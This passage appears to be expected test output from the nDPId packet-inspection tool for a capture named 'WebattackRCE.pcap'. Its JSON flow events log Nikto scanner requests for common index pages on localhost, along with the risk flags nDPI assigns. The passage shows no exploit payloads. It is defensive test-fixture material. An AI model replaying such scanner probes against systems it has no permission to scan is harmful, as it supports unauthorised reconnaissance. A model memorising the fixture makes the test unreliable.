-01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276813,"pkt":"AAAAAAAAAAAAAAAACABFAADI2h9AAEAGYg5\/AAABfwAAAcJIH5At6uIveFvtbIAYAED+vAAAAQEICp1m+3WdZvt1R0VUIC9pbmRleC5zaHRtbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276815,"pkt":"AAAAAAAAAAAAAAAACABFAADGtzZAAEAGhPl\/AAABfwAAAcJKH5BukY8IX6sJe4AYAED+ugAAAQEICp1m+3edZvt2R0VUIC9pbmRleC5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276817,"pkt":"AAAAAAAAAAAAAAAACABFAADGzfJAAEAGbj1\/AAABfwAAAcJMH5CEyfXFi\/ZWqoAYAED+ugAAAQEICp1m+3mdZvt5R0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276819,"pkt":"AAAAAAAAAAAAAAAACABFAADFj3JAAEAGrL5\/AAABfwAAAcJOH5DAfLdF0MycV4AYAED+uQAAAQEICp1m+3udZvt7R0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276820,"pkt":"AAAAAAAAAAAAAAAACABFAADG77xAAEAGTHN\/AAABfwAAAcJQH5DIa9eQqgE4nYAYAED+ugAAAQEICp1m+3ydZvt8R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276821,"pkt":"AAAAAAAAAAAAAAAACABFAADHQ2dAAEAG+Md\/AAABfwAAAcJSH5BEZHtRsCeOn4AYAED+uwAAAQEICp1m+32dZvt9R0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276823,"pkt":"AAAAAAAAAAAAAAAACABFAADI9WNAAEAGRsp\/AAABfwAAAcJUH5Atl81VKdEVGoAYAED+vAAAAQEICp1m+3+dZvt\/R0VUIC9kZWZhdWx0LmFzcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276824,"pkt":"AAAAAAAAAAAAAAAACABFAADJPphAAEAG\/ZR\/AAABfwAAAcJWH5C0BwahLC3FVoAYAED+vQAAAQEICp1m+4CdZvuAR0VUIC9kZWZhdWx0LmFzcHggSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276825,"pkt":"AAAAAAAAAAAAAAAACABFAADIFrxAAEAGJXJ\/AAABfwAAAcJYH5C2Ei6NIzroBYAYAED+vAAAAQEICp1m+4GdZvuBR0VUIC9kZWZhdWx0Lmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276827,"pkt":"AAAAAAAAAAAAAAAACABFAADFTUVAAEAG7ut\/AAABfwAAAcJaH5CLBXV23SQCI4AYAED+uQAAAQEICp1m+4OdZvuDR0VUIC9pbmRleC5kbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
